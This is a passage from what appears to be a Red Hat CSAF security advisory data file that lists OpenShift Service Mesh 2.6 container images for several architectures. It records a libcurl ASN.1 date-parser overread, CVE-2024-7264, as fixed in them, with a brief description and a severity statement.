"openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "s390x", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", relates_to_product_reference: "9Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64 as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", relates_to_product_reference: "9Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", relates_to_product_reference: "9Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64 as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", relates_to_product_reference: "9Base-RHOSSM-2.6", }, ], }, vulnerabilities: [ { cve: "CVE-2024-7264", cwe: { id: "CWE-125", name: "Out-of-bounds Read", }, discovery_date: "2024-07-31T04:33:09+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2301888", }, ], notes: [ { category: "description", text: "A flaw was found in libcurl, where libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing an ASN.1 Generalized Time field. If a syntactically incorrect field is given, the parser can use -1 for the length of the *time fraction*, leading to a `strlen()` performed on a pointer to a heap buffer area that is not purposely NULL terminated.", title: "Vulnerability description", }, { category: "summary", text: "curl: libcurl: ASN.1 date parser overread", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability is classified as low severity because it primarily results in a heap buffer over-read rather than a direct memory corruption or code execution risk. Since the ASN.1 parsing occurs after a successful TLS handshake, the malformed certificate must first bypass the TLS library's validation, which significantly reduces the likelihood of exploitation. \n\nAdditionally, the impact is limited to a potential crash or unintended heap data exposure through CURLINFO_CERTINFO, but not arbitrary code execution. The requirement for a specific TLS backend configuration and the controlled nature of the memory read further minimize its exploitability.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", 